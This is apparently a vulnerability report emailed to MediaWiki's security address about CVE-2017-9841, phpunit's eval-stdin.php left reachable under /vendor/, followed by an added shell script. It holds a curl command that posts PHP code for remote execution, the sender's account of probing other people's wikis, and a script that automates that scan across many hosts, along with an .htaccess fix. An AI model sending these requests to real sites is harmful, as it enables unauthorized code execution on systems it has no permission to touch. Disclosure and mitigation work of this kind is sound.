Per email received on security@
Hi

On July 27th this year, CVE-2017-9841[0] was issued noting a vulnerability in phpunit. There is actually a good read about it on vulnbusters[1]. There are a lot of convoluted instructions on using composer with MediaWiki and the need for using the --no-dev option. Someone using composer to install the MW extension with or without a composer.local.json file would not be aware of using --no-dev when interacting with composer. Unless I am missing the documentation on MediaWiki.org, please point it out.

An excellent sysadmin I work with on a project noticed an odd process running yesterday, Nov 7th. Doing some back tracing, something was installing phpunit version 4.8.24. After blocking, doing research and running composer with the --no-dev option, the vulnerability was closed.

Doing some testing with the following and using wikiapiary to make a list of wikis:

    curl --data "<?php echo(pi());" https://some-wiki-name.org/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

On the 8th wiki I tried, I came across a vulnerable /vendor/ directory with phpunit. Two of the other 7 returned a 403, so I'm guessing they locked their /vendor/ directory. The other 5 returned a 401. Tested a variety from 1.26 on. It was 1.27.1 that was the one that returned as vulnerable.

Should MediaWiki by default use an .htaccess file in the /vendor/ directory with "Deny from all" by default?

Thanks
Tom Hutchison

[0] http://www.cvedetails.com/cve/CVE-2017-9841/
[1] http://phpunit.vulnbusters.com/
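An added example, not part of the email above and not MediaWiki's or phpunit's own code: a small POSIX shell script that automates the curl probe the email describes (POST "<?php echo(pi());" to phpunit's eval-stdin.php), classifies each wiki's reply the way the email sorts its 8 test wikis (executed, 403/401, etc.), and prints the .htaccess fragment the email asks about. The eval-stdin.php path is the one quoted in the email; the 10 second timeout, the classification labels, the example host names and the script name are assumptions made here.

```shell
#!/bin/sh
# Added example (not from the email or from MediaWiki).
# Probes wikis for a web-reachable phpunit eval-stdin.php (CVE-2017-9841),
# classifies the reply, and prints an .htaccess fragment that blocks /vendor/.
# Assumed: 10 s timeout, label names below, and the example host names in Usage.

EVAL_PATH="/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
PROBE='<?php echo(pi());'

# classify STATUS BODY
#   vulnerable          : 200 and pi() shows up in the body, so the server ran our PHP
#   served_not_executed : 200 but no pi() in the body (file reachable, code not evaluated)
#   denied              : 401/403, the directory is access-controlled (the email's 403s and 401s)
#   absent              : 404, no phpunit reachable under /vendor/
#   other               : anything else (redirect, 5xx, empty status after a timeout)
classify() {
    case "$1" in
        200)
            case "$2" in
                *3.14159*) echo vulnerable ;;
                *)         echo served_not_executed ;;
            esac ;;
        401|403) echo denied ;;
        404)     echo absent ;;
        *)       echo other ;;
    esac
}

# probe BASE_URL: one curl call; -w appends a final line holding the HTTP status code,
# so body and status can be split apart afterwards
probe() {
    base="${1%/}"
    out=$(curl -s --max-time 10 --data "$PROBE" -w '\n%{http_code}' "$base$EVAL_PATH")
    status=$(printf '%s\n' "$out" | tail -n 1)
    body=$(printf '%s\n' "$out" | sed '$d')
    printf '%s %s\n' "$base" "$(classify "$status" "$body")"
}

# htaccess_deny: the "Deny from all" the email proposes, in both the Apache 2.2 and
# Apache 2.4 spellings; save the output as vendor/.htaccess (needs AllowOverride)
htaccess_deny() {
    cat <<'EOF'
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
EOF
}

# Usage (assumed script name and hosts):
#   ./vendor-probe.sh https://wiki1.example https://wiki2.example
#   ./vendor-probe.sh $(cat wikis.txt)
if [ $# -gt 0 ]; then
    for u in "$@"; do probe "$u"; done
fi
```

The match on "3.14159" is what separates a server that actually evaluated the posted PHP from one that merely served the file or an error page with a 200, which a status code alone cannot tell apart. The fragment carries both directive forms because "Deny from all" on its own is not understood by Apache 2.4 unless mod_access_compat is loaded, and an unknown directive in .htaccess turns every request under that directory into a 500 rather than a clean 403.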